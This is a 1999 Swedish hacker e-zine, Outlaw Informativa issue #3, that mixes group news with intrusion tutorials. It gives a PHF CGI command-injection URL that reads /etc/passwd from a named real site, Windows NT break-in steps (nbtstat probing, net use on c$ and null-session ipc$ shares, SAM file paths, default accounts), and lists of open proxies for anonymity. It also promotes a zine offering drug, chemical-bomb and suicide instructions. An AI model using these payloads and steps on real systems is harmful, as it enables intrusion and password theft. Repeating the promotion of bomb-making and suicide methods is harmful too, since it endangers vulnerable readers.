01:25 1999-03-27





                             Heretics Inc. Presenterar...





                             O U T L A W  I N F O R M A T I V A

                                                       issue #3  





                                     Alkohol och Säkerhets hål 

                                        är de enda hål jag tål                            

                .I.

               / : \                           

               |===|          

               >._.<                          

           .=-<     >-=.      ¤ Outlaw-STAFF

          /.'`(`-+-')'`.\       o Disclaimer 

        _/`.__/  :  \__.'\_     o Ledare

       ( `._/\`. : .'/\_.' )    o Medverkande

        >-(_) \ `:' / (_)-<     o Heretics Newsletter

        | |  / \___/ \  | |     o Heretics Historia

        )^( | .' : `. | )^(     o The Translation Project

       |  _\|`-._:_.-'| \  |   

       "-<\)| :  |  : |  "-"   ¤ Nyheter & Viktig info

          (\\| : / \ : |         o Ny Phreaking grupp

            \\-:-| |-:-')        o Nytt högklass Ezine

             \\:_/ \_:_/         o AXE växel utslagen

             |\\_| |_:_|         o move.to/kula, hacked

             (;\\/ \__;)         o Viktig Information!

             |: \\  | :|       

             \: /\\ \ :/       ¤ Hacking & Cracking

             |==| \\|==|         o Back Orifice

            /v-'(  \\`-v\        o En lista med Proxy servers

           // .-'   \\. \\       o ...och en med Wingate servers

           `-'       \\`-'       o PHF buggen

                      \|         o Windows NT Hacking

     

                               ¤ Phreaking 

                                 o Sverige är Avlyssnat

                                 o SMEK AB

                             

                               ¤ Teknik

                                 o Elektroniska Störningar



                               ¤ Tankar & Filosofier

                                 o Anonymitet                               



                               ¤ Bland Tomtar och Troll                            

                                 o Kul .log

                                 o VSP kritiserar



                               ¤ Köpes och Säljes

                                o Flashback tidningar

                                o Never stop that feeling



                               ¤ EOF

                                o Copyright

                                o Prenumeration





                               

                               Hemsida : www.heretics.cjb.net         

                               Filarkiv: www.heretics.freeservers.com 

                               Email   : knash@linux.nu              







o----------------------------------------------------------------------¤

¦ Disclaimer                                                     knash ¦

o----------------------------------------------------------------------o

Denna  information  är endast skriven som underhållning och informations

syfte.   Denna  information  kan vara olaglig så vi tar inget ansvar för

dina handlingar med denna information.





       ____________________________OBS!__________________________

      Det är  absolut förbjudet för alla  myndighetspersoner och

      personer utsedda  av dessa att  läsa detta e-zine utan min

      skriftliga tillåtelse eller order om husrannsakan.

      Överträdelse leder till att all information publicerad här

      kommer  att underkännas  som bevisföring i svensk  domstol

      enligt Svea  Rikes Lag. När jag bryter mot PUL gör jag det

      i egenskap av journalist el. konstnär, välj själv vilket.

      ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯



o----------------------------------------------------------------------o

¦ Ledare                                                         knash ¦

o----------------------------------------------------------------------o

Tjo..Nej  det  är  ingen  hallucination,  Outlaw  Informativa #3 är ute.

Hoppas detta zine bara blir bättre och bättre för varje gång. Vi skriver

för er och inte för  oss  själva. Men det är klart, själv tycker jag det

är kul att skriva. Jag kommer att börja skriva lite om C++ programmering

här hade jag tänkt mig. Men det blir inte i detta nummer. För det första

har jag inte sysslat med programmering på ett bra  tag  så  jag  måste i

första taget uppdatera mig  inom  programmeringen. En  granne  till  mig

ringde och sa att han ville vara med och lära sig C++. Hur ska detta gå?

hehe det löser  sig säkert. Han får väl programmera ifatt mig skulle man

ju kunna säga. Just det om du har lust att göra reklam för din IRC kanal

eller nåt så kan du ju maila mig (knash@linux.nu)



o----------------------------------------------------------------------o

¦ Medverkande                                                          ¦

o----------------------------------------------------------------------o



# Knash

# knash@linux.nu

# Founder



# OverMarZz_

# mixtile112@hotmail.com

# 0nd telecom phreakZor



o----------------------------------------------------------------------o

¦ Heretics Newsletter                                            knash ¦

o----------------------------------------------------------------------o

Som ni vet så har jag ju skickat ut lite Newsletters lite då och då. Det

ska jag sluta med därför  att  jag har fått in klagomål. Alltså folk som

tycker det bara är skit. Nyheterna kommer istället att hamna på main.htm

på www.heretics.cjb.net



o----------------------------------------------------------------------o

¦ Heretics Historia                                              knash ¦

o----------------------------------------------------------------------o

Heretics startades i slutet av 1998. I  början  var  det  mest  jag  som

arbetade med alla projekten sen när vi började bli lite  "små kända"  så

öppnade medlemmarna ögonen och började skriva  lite, crazy-train  kom ut

med bland annat  en  serie med 3 textfiler om växelsystm i detta fall om

telefon växlar. Sen när jag kommit ut med 5 nummer av T-SueZ  så började

jag tröttna på namnet, för lamt helt enkelt. Så jag bytte till  O-I  som

då står för Outlaw Informativa, inforamtiva är ett påhittat slang  bara.

2 medlemmar blev kickade på grund av att dom inte hjälpte till  och  att

dom inte hade ork/lust/tid att hjälpa till.



Men var har jag nu fått ordet Heretics ifrån. Jo  det  började  faktiskt

tidigt med ett samtal med Paranoya och han gav förslaget och sa  att man

kunde döpa en grupp till Heretics. Coolt sa  jag  sen  ett  par  månader

efter så startade jag gruppen och la till ett Inc i slutet för  att  det

skulle se lite snyggt ut. Vid en uppslagning av ordet Heretics  så  fick

jag resultatet:



Svenskt uppslagsord

 kättare kättar(e)n kättare kättarna subst. 

 person vars tro avviker från den officiella 

  

Engelsk översättning

 heretic 



Sammansättningar/avledningar

 kätteri---heresy 



hmm..aviker från tron. JAPP, det är vi det förutom pojken Dreamfish  som

tror  på  gud fett. Jag bryr mig inte han är ju teknik fantast så det är

ju lugnt. Men visst har vi lite olika åsikter om tron.



o----------------------------------------------------------------------o

¦ The Translation Project                                        knash ¦

o----------------------------------------------------------------------o

Vad  gillar  du   Swedish   Documentation   Project? där  en  massor  av

mäniskor  översätter  alla  engelska  HOWTOS  till  Svenska. Det  är  en

guldgruva för alla unga newbies som inte vill spela och andvända  Netbus

och chatta på aftonbladet. Jag har funderat  lite  själv  också  om  man

själv skulle kunna starta ett sånt projekt och det har jag nu gjort. Jag

har gjort TTP [The Translation Project] helt officiellt så alla som vill

kan joina. Men om du vill joina så måste du ha något som du ville övers-

ätta. Det ska inte vara små mini artiklar på 0.5k dom ska väl  ligga  på

en 4k som minimum. Du kan ju fråga mig om det är någon speciell  textfil

som jag rekommenderar att du översätter.



Projektet går alltså ut på att översätta  bra  engelska  textfiler  till

svenska för att unga newbies ska förstå och lära  sig  lättare. Även  du

kommer att få bra material medans dom andra också får bra material.



Klara översättningar:



 ¤ The Bug Detector 

 ¤ Car Tracker 

 ¤ An introduction to networking: What it's all about





Under översättning:



 ¤ The Ultimate beginners guide to Hacking and Phreaking 

 ¤ The Paranoid Schizophrenics Guide to Encryption 

 ¤ Simple Data Encryption 

 ¤ A TCP/IP Tutorial : Behind The Internet



Alla klara översättningar går att hitta på:



 http://members.xoom.com/ticks/project/ttp.htm





Om du vill joina skickar du ett email till  mig  på  knash@linux.nu  med

subjektet Joina TTP och i mailet  skriver  du  vilken  textfil  du  vill

översätta och hur stor den är. Om du inte vet vad för  textfil  du  vill

översätta så kan du fråga mig och hur stor textfil du kan  översätta  så

tar jag fram en bra ur mitt textfil arkiv =)



Exempel:



To     : knash@linux.nu

Subjekt: Join TTP



Message: Jag vill översätta XXXX som tar 30k och den blir  typ  klar  om

         1 vecka.



------------------------------------------------------------------------



To     : knash@linux.nu

Subjekt: Join TTP



Message: Jag hade tänkt mig att översätta en textfil mellan  20-60k  har

         du något som jag kan översätta?



To        : din@emailadress.com

Subjekt   : RE: Joina TTP

Attachment: XXXX textfil



Message   : Du kan översätta den här, den tar 40k och är mycket bra.

            //Knash of HereticsInc.



Nu kan vilken mäniska som helst joina =) För nu har jag gjort  en  idiot

förklaring av det hela.



o----------------------------------------------------------------------o

¦ Ny Phreaking grupp                                             knash ¦

o----------------------------------------------------------------------o

När  det  kom  en  massa  folk  som  sa att  dom skulle starta en svensk

phreaking  grupp, nämerligen  o7nio75,  blev  man  ju  mycket  glad  och

förvantansfull. Jag trodde och hoppades att det skulle bli  något  stort

och bra. Men det gick inte så bra för gruppen..Rollie  Tyler  hade  haft

modem problem och sen när han  fixade  problemet  så  kom  han  upp  och

klagade och då hoppade alla av och detta ledde till att  gruppen las ner

men Tyler ger inte upp, jag hoppas att det blir något  bra  av  den. Men

TheClown och p01nt_zer0 startade  en  egen  ni  grupp  istället  som  nu

heter United Phrikkers of Sweden. Ni kan ju kolla deras  hemsida  också,

den ligger på www.upos.cjb.net. Dom kommer att komma med ett ezine  ock-

så och det hoppas jag blir  bra. Förövrigt  är  deras texter mycket bra.

Speciellt dom om Mobiltelefoni.



Founders: TheClown, p01nt_zer0

Hemsida : www.upos.cjb.net



- End of reklam



o----------------------------------------------------------------------o

¦ Nytt högklass Ezine                                            knash ¦

o----------------------------------------------------------------------o

Japp, ännu ett nytt ezine..fan vad kul ! Detta ezine är i liknande  stil

som LOD. Zinet jag snackar om heter Den svarta Cirkeln. En så länge  har

dom kommit  ut med  2  nummer. Innehållet  då? jorå..jag  kan  ta  några

smakbitar ur innehållet av ettan. 



Så blåser du snuten! (Hur du kommer undan i förhör)

Droger (Hur du gör egna billiga droger)

Kemi (Hur du gör kemiska bomber)

Terrorisera skolan (Hur du har KUL i skolan)

Självmord (Hur du tar självmord på rätt sätt)

Phreaking guiden (Enkel beige boxing guide)

20 sätt att döda med dina barera händ (som på namnet)



Observera att detta bara var ur ettan.



Om du vill kontakta dem så kan du ju maila crewdsc@usa.net  eller  joina

#crewDSC på DALnet.



o----------------------------------------------------------------------o

¦ AXE växel utslagen                                             knash ¦

o----------------------------------------------------------------------o

En AXE växel i stockholm har varit  utslagen  i  8  timmar.. Grymmt, men 

aemkey den fan tog aldrig med tidningen där det stod om det.



o----------------------------------------------------------------------o

¦ move.to/kula, hacked                                           knash ¦

o----------------------------------------------------------------------o

move.to/kula  är  hackad.  Av  msf  (MickeStarFighter)  på  Swehack. Han

andvände sig av cgi för att  snappa  åt  sig  passwd  filen (säger han),

du kan ju kolla eller nåt.



o----------------------------------------------------------------------o

¦ Hjälp till för fan                                             knash ¦

o----------------------------------------------------------------------o

Har ni lust att  hjälpa en gammal polare som råkat fått böter för 

ett inbrott? 

Gå bara till adressen nedan och låt sedan sidan ladda klart 

så får han in 20 cent till att betala böterna med, inte mycket 

men det hjälper iaf. 

  

 http://www.spankys.net/click.link/scorpan 

  

Samtliga som klickat kan skicka mail till mig och tala om vilket 

det första ordet som visas på första sidan är så får ni ett gratis 

shellkonto. Om ni inte vet vad ett shellkonto är så kan ni alltid 

byta det mot något på en IRC kanal [chat] eller liknande. Shellkonton 

vill många ha så ni får det enkelt bytt mot ett internet abbonemang 

eller gratis webutrymme/whatever. Kom ihåg att jag har inte hur 

mycket konton som helst så snabba er på. Inte mycket arbete för 

eran del ivf. 



Till alla er som skriver zines: 

Ha med denna text i nästa nummer så fixar jag en egen server till dig. 



/ ninJai [ http://www.rat.pp.se/hotel/ninjai ]



o----------------------------------------------------------------------o

¦ Back Orifice                                                   knash ¦

o----------------------------------------------------------------------o

Jag skrev lite om Back Orifice efter jag skrev artikeln "En flaska Viru-

s" i Outlaw Informativa, issue 2. Men jag lägger in  det  här  istället.



Är även en fruktad trojan bland folk som inte vet riktigt vad  säkerhet

är. Jag kan börja med att berätta att  porten  BO  andvänder är  31337.

Jag ska seriöst berätta att jag aldrig har blivit infekterad av  BO  så

jag vet inte riktigt hur en beter sig och så. Men om du  nu  tror eller

vet att du är infekterad med BO, starta c:\Windows\regedit.exe  (win95)

och gå till HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersi-

on\RunServices (Lägg märke till radbryte) Om du nu inte  är  infekterad

så ska strängvärdet i /RunServices se ut så här...



Name:       Data:

(Default)   (value not set)



Men om du nu skulle vara infekterad så ska strängvärdet i  /RunServices

se ut så här...



Name:       Data:

(Default)   (.exe)



Standard namnet för Back Orifice Servern är (space-dot.exe) alltså .exe

Tänk på att BO servern kan heta vad som helst, kännetecknet på  den  är

att ikonen är transparent, alltså med andra ord att den inte bär  någon

ikon. Men gör inget av det som  står  ovan  än, först sk a du  ta  bort

pathen som lägger sig i c:\Windows\System. Ovan har du  förhoppningsvis

tagit en titt i  registret och sett vad servern heter, ovan  i exemplet

heter den ju ".exe" som är standard namnet för BO  Servern. Om  servern

heter ".exe" så leter du efter filen på c:\Windows\System\.exe. Jag kan

också notera att BO Servern tar 122kb. BO Servern andvänds  av  Windows

så starta om datorn i DOS läge och gå till den mapp och ta  bort ".exe"

Nu har jag  ännu tagit en ordenklig idiot förklaring om BO för att alla

ska förstå.



o----------------------------------------------------------------------o

¦ En lista med Proxy servers                                     Knash ¦

o----------------------------------------------------------------------o

Proxy servern kan utnyttjas bla. vid anonymitet. Här kommer en lista med

ett par andvändbara Proxy servers. Alla  dessa  är  ju  också  Anonymous

Proxies.



 128.174.0.245:80

 165.138.113.247:8080

 192.133.190.2:80

 192.133.190.65:80

 193.167.166.29:80

 194.42.176.4:80

 194.66.38.33:3128

 194.140.15.162:8080

 194.140.17.130:80

 194.201.13.126:8080

 194.235.141.25:80

 195.170.96.4:80

 195.178.64.180:80

 198.161.26.33:80

 198.161.26.65:80

 199.212.215.12:8080

 202.213.214.42:8080

 202.214.200.1:8080

 202.215.56.2:8080

 202.223.200.51:8080

 202.229.169.190:8080

 202.230.39.9:8080

 202.230.9.115:80

 202.237.40.67:8080

 202.247.50.201:8080

 202.248.104.20:8080

 203.140.150.57:8080

 203.24.127.4:80

 203.38.54.180:80

 203.139.36.37:80

 204.61.76.110:8080

 204.210.64.21:8080

 206.101.198.50:80

 207.164.116.152:8080

 207.249.163.253:80

 207.35.39.42:8080

 207.79.212.70:80

 208.137.110.1:80

 208.196.150.4:80

 208.196.154.84:80

 209.20.42.6:3128

 210.131.240.3:80

 210.140.48.2:8080

 210.145.39.211:8080

 210.160.178.46:8080

 210.161.225.164:80

 210.163.132.10:80

 210.170.69.146:8080



 proxy3.emirates.net.ae:8080

 proxyf.emirates.net.ae:8080

 proxyi.emirates.net.ae:8080

 proxyj.emirates.net.ae:8080

 proxyk.emirates.net.ae:8080

 cache02.netway.at:80

 www-proxy.tecan.co.at:8080

 basil.acr.net.au:8080

 jethro.meriden.pas.com.au:8080

 proxy.gwbbs.net.au:80

 proxy.newave.net.au:8080

 ws.edi.com.au:80

 proxy.co.rmit.edu.au:8080

 albany.jrc.net.au:80

 basil.acr.net.au:8080

 jethro.meriden.pas.com.au:8080

 max.ilb.com.au:80

 mel-proxy0.one.net.au:8080

 ws.edi.com.au:80

 cache-mar.belbone.be:80

 ct-nt-02.cybertelecom.com.br:8080

 sanan.com.br:8080

 proxy.www.lysator.liu.se:80

 hassaleh.tdb.uu.se:8080

 proxy.qatar.net.qa:8080

 ankara3.turnet.net.tr:8080

 zeus.doruk.net.tr:8080

 proxy1.turnet.net.tr:8080

 proxy2.turnet.net.tr:8080

 proxy3.turnet.net.tr:8080

 www.ecs.com.tw:80

 gis2.epa.gov.tw:8080

 host1.2106216.gcn.net.tw

 proxy.systex.com.tw

 linux.kcg.gov.tw

 www.ccpc.com.tw

 proxy.ivnet.com.tw

 cache-1.golden.net:80

 cache2.bora.net:80

 proxy.golden.net:80

 sprintcache.micron.net:80

 proxy.golden.net:3000

 mars.germany.net:3128

 duluth.cache.mr.net:3128

 rochester.cache.mr.net:3128

 web-proxy.geo.net:8000

 cache01-e4a.proxy.ozemail.net:8080

 cacheflow.cyberramp.net:8080

 dead.wwwcache.ja.net:8080

 ginger.wwwcache.ja.net:8080

 idefix.germany.net:8080

 ixproxy1.telia.net:8080

 ixproxy2.telia.net:8080

 ixproxy3.telia.net:8080

 nexus-1.flash.net:8080

 polk.se.mediaone.net:8080

 ftp.castel.nl:8080

 www-proxy.ele.tue.nl:80

 homepages.harbinger.nl:8080

 hpsl.ics.ele.tue.nl:80

 proxy.mcmail.com

 proxy.co.rmit.edu.au

 proxy2.lsil.com

 proxy.speedware.com

 gossamer.ksu.ksu.edu

 gateway.kwantlen.bc.ca

 sakura.my-pharm.ac.jp

 depxy02.mw.mediaone.net

 ns1.san.rr.com

 proxy.berlin.sireco.ne



o----------------------------------------------------------------------o

¦ ...och en med Wingate servers                             OverMarZz_ ¦

o----------------------------------------------------------------------o



 cscott.gibbco.com 

 CBL-pssandhu1.hs.earthlink.net 

 poste253.autray.net 

 excelmach.com 

 mail.arielmutualfund.com 

 zeus.radio.pub.ro 

 www.winntech.net 

 www.aquatechpools.com 

 pop3.winntech.net 

 vsat.mn 

 billymchales.com 

 golden.datainstitute.com 

 hou3-25.flex.net 

 roaming.in.the.pridelands.org 

 adsl1-110.mts.net

 mage.real-time.com 

 eve.genius-net.co.jp 

 wiener.crema.unimi.it =) =) 

 intexhome-gw.in-tex.co.jp 

 turtasint.turtas.lt 

 TPARK-Relarn.Relarn.ru 

 relarn-relay.tasur.edu.ru 

 ns.jafa.or.jp 

 asu.nips.nsc.ru 

 202.135.160.10

 softengtech-i.iquest.net 

 www.tj.ro.gov.br 



o----------------------------------------------------------------------o

¦ PHF buggen                                                     knash ¦

o----------------------------------------------------------------------o

Här kommer jag med en lite note om PHF buggen. Allting går ut på att  få

tag i en oskuggad passwd fil. För dig som inte vet vad en skuggad passwd

fil är kan ju läsa nedan eller nåt.



En skuggad passwd fil (fejkad)

 operator:*:11:0:operator:/root:/bin/bash

 games:*:12:100:games:/usr/games:

 man:*:13:15:man:/usr/man:



En oskuggad passwd fil (fejkad)

 operator:or3hclYveE.11:0:operator:/root:/bin/bash

 games:HkNUIj3kev.12:100:games:/usr/games:

 man :HlenJkd8nE.13:15:man:/usr/man:



Humm..nybörjar kurs ?

Jaja, tillbaka till PHF buggen. PHF finns  installerat  på  många  äldre 

web servers.



Om du nu skulle vilja kolla om passagen har PHF installerat så skulle du

skriva  http://passagen.se/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd.

Oberserva att punkten inte ska vara med i slutet.

Vad är då denna /cgi-bin/phf?Qalias=%0A/.... ?

I själva verket är det ett fejkat phf script..

Jappz.. det var allt för mig =) 



o----------------------------------------------------------------------o

¦ Windows NT Hacking                                             knash ¦

o----------------------------------------------------------------------o

Jag är själv ingen direkt NT guru så klaga inte på  detta  jag  skrivit.

Windows NT är lätt hackat säger många, skolor  runt  om  i  hela Sverige

andvänder ju Windows NT. Jag tänke förklara lite enkelt  olika  tekniker

för att bryta dig in, komma åt passwd filer osv.



 [ Kolla om det är en Windows NT Server

 [ Fil delning (File Sharing)

 [ Komma in på SAM

 [ Password filer

 [ Standard konton





 o Kolla om det är en Windows NT Server

   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Telnetta  till  port  21 (porten som ftp andvänder) och kolla om utdatan

ger något.



Testa att NBTSTAT -A [ip address] och kolla utdadan.



Ett annat sätt är att andvända sig av ett cgi script som kollar  server,

finns på http://www.netcraft.com/cgi-bin/Survey/.





 o Fil delning (File Sharing)

   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

För att kolla om servern har fil delning gör du så här..



1. DNS www.offret.com och fixa ip numret.

2. Gå till dos prompten och skriv nbtstat -A IPADDRESS



Du kommer få 1 av två saker tillbaka:



A. Host not Found, det är iofs inte riktigt ett  fel  meddelande. Om  en

   Router (ellet NT servern själv) har  blockerat  portarna  137,138,139

   som även är portar som Denial Of Service andvänder sig av (typ wnuke)



B. NetBIOS Remote Machine Name Table



   Name Type Status

   ---------------------------------

   TARGET <00> UNIQUE Registered

   A DOMAIN <00> GROUP Registered

   TARGET <03> UNIQUE Registered

   TESTUSER <03> UNIQUE Registered

   TARGET <20> UNIQUE Registered

   A DOMAIN <1E> GROUP Registered



   MAC Address = 00-60-97-35-C1-5C



   Om du för upp en "NetBIOS Remote Machine Name Table" så  har  servern

   Fil delning.



Det finns 2  saker  så  vitt  jag  vet som du kan testa för att komma åt

Fil delningen.



1. Öppna c:/Windows/lmhosts (LMHOSTS filen innehåller NetBIOS till

   IP address Mappning) Du ska asså lägga till en rad längst upp i fil-

   en som ser ut så här:



   Servernamn(Kalla den vad du vill) ServernsIPadress



   Sen klickar du på starknappen sen Sök/Dator, i namn fältet skriver du

   in namnet på servern som du la in i LMHOSTS (Servernamn i detta fall)

   Sen så ska det komma upp  en  liten  ikon  på  en  dator  komma  upp.

   Dubbelklicka på datorn, om  Fil  delningen  på  datorn  är  lösenords

   skyddat så kommer det komma upp en liten söt ruta där  det  står  att

   du måste skriva  in  ett  lösenord, du  kan  testa  att  gissa  eller

   forcera det.

  

2. Det finns ett annat sätt också, gå till dos prompten eller klicka dig

   fram till kör och skriv  in  net use \\DATORNSIPADDRESS\c$, c$  menar

   alltså c: disken (root drive) Denna kan vara  lösenords  skyddat  den

   med, men det finns många NT servrar som andvänder Fil delning och som

   saknar lösenord.

   

   Kepp searching for unpassworded computers !





 o Komma in på SAM



Detta läste jag i kl0rb, så jag har inga direkta  kunskaper  kring  SAM.

Men det jag läste gick i alla fall ut på för det första att  få  upp  en

dos prompt och sedan andvända sig av kommandot:



net use XXX: \\"IPnr eller servernamn \ipc$ "" user/:""



SAM = Security Account Manager





 o Password filer

   ¯¯¯¯¯¯¯¯¯¯¯¯¯¯

\\WINNT\SYSTEM32\CONFIG\SAM - Windows NT´s passwd fil.

\\WINNT\REPAIR              - Backup av passwd filen.



Det trevliga med Windows NT  är  att  dom  andvänder  samma  krypterings

algoritm som *nix (Unix system)



Sen vet du att det finns massor av bra och snabba Unix password crackers

lite överallt. Men låt oss gå till hur passwd filen ser ut.



rewt:jk73njnu43 - Windows NT passwd fil



rewt är alltså andvändarnamnet (username)

och jk73njnu43 det krypterade lösenordet.



En Unix password fil ser ut så här:



rewt:jk73njnu43:0:0:comments:/:/bin/bash





  o Standard konton

    ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Standard konton (Common accounts) är konton  som  är  förinstallerade  i

NT systemet. Jaja, men här är dom i alla fall.



 Administrator

 Guest

 mail



-----------------------------------------------------------------------o

¦ Sverige är Avlyssnat                                           knash ¦

o----------------------------------------------------------------------o

Tio  svenska  ambassader  slår  larm  till  utrikesdepartementet: Vi  är 

avlyssnade. Aftonbladet kan i dag  avslöja  ambassadernas  rapporter  om 

främmande länders spioneri mot de svenska diplomaterna. På utrikesdepar-

tementet, UD, är man väl medveten  om  den  allvarliga  situationen  med 

buggade telefoner och andra avlyssningsmetoder: Det händer rätt så ofta, 

säger UD:s pressombudsman Jens Odlander. Men det är någonting vi allmänt 

sett av olika skäl, mellanstatligt, inte vill gå och torgföra  på  något 

sätt. Man tar upp det och sen löser man  det. Aftonbladet  har  kartlagt 

läget vid en  rad  svensk  beskickningar. Många  rapporterar  om  hemlig 

avlyssning eller misstankar om detta.



Tv-övervakade bostäder Telefonerna  avlyssnas  regelmässigt, rapporterar 

den svenska ambassaden i Vietnam. Åtminstone ett  av  de  bostadskomplex 

där  svenska   tjänstemän   bor  är  tv-övervakat,  konstaterar  svenska 

ambassaden i Kina. De svenska diplomaterna i Vietnam har mått dåligt  av

spionaget och övervakningen. I våras skrev ambassaden i en rapport  till 

statens utlandslönenämnd: Bevakningen har tilltagit det senaste  året... 

Man får iaktta  försiktighet  vad  gäller  kritik  av  landets  politik. 

Avlyssning av bostäder kan tidvis innebära  en  psykisk  press. I  vissa

fall har svenskarna hittat avlyssningsutrustning  och  tagit  upp  saken 

med det aktuella landet. Ibland så förnekar de. Ibland kan de  säga  att 

de har gjort det, men att det inte ska upprepas. Nära  nog  alla  samtal 

avlyssnas Svenska ambassaden i Pakistan  rapporterar  om  den  närgångna 

och  intensiva   bevakningen   från   underrättelsetjänsten   i  landet:

Avlyssning förekommer, särskil t av  utlänningar  och  ambassadpersonal. 

Man får räkna med att nära nog alla telefonsamtal, både från  ambassaden 

och hemmet, avlyssnas. Detta märks ibland  väldigt  tydligt. Så  kallade 

felringningar är  också  vanliga. Bevakning  och  rekryteringsförsök  är 

relativt  ovanliga,  medan  komprometteringsförsök  förekommer. Även  de 

svenska ambassaderna i Algeriet,  Etiopien,  Lettland,  Elfenbenskusten, 

Zambia och Indonesien misstänker att de utsätts  för  telefonavlyssning.

Man  får   räkna  med  att  avlyssning  förekommer  i  både  kansli  och 

bostäder, konstaterar den svenska beskickningen  i  Etiopiens  huvudstad 

Addis Abeba.



Närgången övervakning 

Den svenska ambassaden  i  Peking  misstänker  utöver  telefonavlyssning 

att  de   också   utsätts   för   en   mycket   närgången   övervakning:

Bevakningen sker öppet av de särskilda bostäder  där  utlänningar  måste

bo. Detta inkluderar ambassader  och  företag, men  även  privatbostäder 

och förmodligen även platser där utlänningar  regelbundet  vistas, såsom 

hotell, vissa restauranger, hissar etc. Det  finns  flera  indikationer,

även från andra ambassader, att hotell- och faxkommunikation regelbundet 

avlyssnas och snappas upp. På  svenska  ambassaden  i  Belgrad  har  man 

drabbats  konkret av det omfattande  underrättelsearbetet  i  landet. En

kosovoalban som hade pratat med en ambassadtjänsteman  blev  kort  efter 

utsatt för ett långt förhör av  den  serbiska  säkerhetstjänsten, enligt

ambassaden.



Mikrofoner i väggarna

Den jugoslaviska  säkerhetstjänsten  är  omfattande   och  aktiv... Inga 

rekryteringsförsök har observerats, men ett aktivt informationsinsamlan-

de pågår, rapporterar  svenska  ambassaden. Även  svenska  ambassader  i 

länder där man inte har konkreta  misstankar  om  avlyssning  iakttar en 

viss försiktighet. Ja, man  tänker  på  vad  man  säger, förklarar  Lena 

Sundh som är ambassadör vid svenska beskickningen i  Angola. Ett  av  de

länder som ertappats flest gånger med avlyssning på svenska beskickning-

ar är det forna Sovjetunionen. Både  1986  och  1988  påträffades  gömda 

mikrofoner på den svenska ambassaden i Moskva. 1992 hittades  samma  typ 

av mikrofoner ingjutna i bärande väggar på det svenska generalkonsulatet 

i S:t Petersburg. 



Rutiner för känsliga samtal

Många ambassader har lärt sig att leva med säkerhetstjänsternas närgång-

na bevakning. Det ligger i sakens natur att på platser där det misstänks 

att det förekommer olovlig underrättelseverksamhet  och  övervakning  av 

våra ambassader så vidtar man en massa åtgärder för att  förhindra  det, 

säger UD:s  pressombudsman  Jens  Odlander. På  många  ställen  har  man 

inrättat speciella rutiner för känsliga samtal  och  speciella  rum  som 

anses säkra. På en del platser  måste  man  göra  det, konstaterar  Jens

Odlander.



OBS! Denna artikel är rippad från Aftonbladet OBS!



Källa: www.aftonbladet.se



o----------------------------------------------------------------------o

¦ SMEK AB                                                        knash ¦

o----------------------------------------------------------------------o

Om du är som jag, skum..typ går  ut och tar promenader mitt i natten och

utforskar en massa boxar (själv) och du har säkert sett  boxar  som  det

står SMEK AB på lite läckert med  svart  text  och  gult  i  bakgrunden.

SMEK AB boxar är teleskåp och JA det är Telia som servar dom, MEN det är

inte Telia som gör boxarna. Det SMEK AB  eller  rättare  sagt SMEKAB AB,

men jag säger SMEK AB. Men i alla fall, SMEKAB AB  levererar, tillverka-

r telefonboxar till Telia. Som ni vet så är  inte  Telias  boxar  direkt

ointagliga, SMEK  AB´s boxar är mkt svårare att ta sig in i, inte ointa-

gliga dock. Jo just det, SMEKAB står typ för Skogslösa Mek. Verkstad AB,

och telefonnumret är: 044-76700 och FAXnumret: 044-70150.



o----------------------------------------------------------------------o

¦ Elektroniska Störningar                                    knash ¦

o----------------------------------------------------------------------o

Störningar är en vanligt fenomen. Om  du  t.ex.  sätter  på en mobil och

sätter den  under  dataskärmen  så  flippar skärmbilden ur totalt. Detta

beror på en korsning (störning) av  strålning från skärmen och strålning

från mobilen. Nedan följer en lista med källor till störningar och utru-

stning som kan bli utsatt för störningar. Lägg märke  till  att  det  är

många känsliga komponenter som kan bli störda, alltså skulle  det  kunna

leda till katastrofer så du kan ju ta denna text som en del av  sektion-

en "Security"







 o Källor till störningar

 

 Garagelöppnare

 Mikrovågsugn

 Radiostyrningar

 TV-Mottagare

 Induktionsvärmare

 Trådlösa snabbtelefoner

 Diatermiutrustning

 Motordrivna verktyg

 Dammsugare

 Elektriska gräsklippare

 Rakapparater

 Symaskin

 Brännare till oljelampa

 Tyristorregleringar

 Tändsystem för motorer

 Generatorer

 Laddningsregulatorer

 Spänningsregulatorer

 Varnräknare mm

 Elektriska leksaker

 Modellhärnvägar, bilbanor etc.

 Kassa-apparater

 Rundradiosändare

 Kommunikationsradio

 Personsökaranläggningar

 Elektriska klockor med centralur (OBS långa ledningar)

 Värmeskydd på ringledningtransformatorer

 Neonljus

 Elstängsel

 Akvarievärmare

 Elektrisk lakan

 Datorer

 Elektroniska spel

 Högspänningstransformatorer





 o Utrustning som kan bli störd



 TV-Mottagare

 Kabel-TV-utrustning

 Radiomottagare

 Medicinsk utrustning, ex infusiondpumpar

 Låsningsfria bromsar

 Sterioanläggningar

 Snabbtelefoner

 PA-System

 Sprängutrustning

 Rök och brandvarnare

 Ljudbanspelare

 Telefoner

 Telefonväxlar

 Hörapparater och hörselslingor

 Larmanläggningar

 Videobanspelare

 Mätinstrument

 Elektroniska musikinstrument

 Farthållare för bilar

 Garageöppnare



o----------------------------------------------------------------------o

¦ Anonymitet                                                           ¦

o----------------------------------------------------------------------o

Du kanske inte tror mig, men det finns faktiskt lagar som säger  att  du

inte får vara helt anonym. Det finns faktiskt länder där  kryptering  är

förbjudet. Är detta rätta? i helvete heller //Heretics.

Anonymitet gäller lika mycket i hemmet som med sin egen dator. I USA  är

det t.ex. lagligt att skjuta folk  om  dom  skulle  komma  in  på  deras

trädgård och ser misstänkasamma ut. Varför skulle det t.ex. vara olagli-

gt att ha skyddat nummer? nej inte direkt. Lagen har fel, visst  är  det

ju lättare för admin att spåra en hacker med  dålig  anonymitet. Men det

ska vara som i Norge där  var  och  en  tar  ansvar  för  sin/sitt egen/

eget dator/nätverk.



Som  du  kanske  fattar ska detta bli en debatt. Skicka in vad du tycker

och dina kommentarer.



Email: knash@linux.nu / keytrace@usa.net



o----------------------------------------------------------------------o

¦ Kul .log                                                             ¦

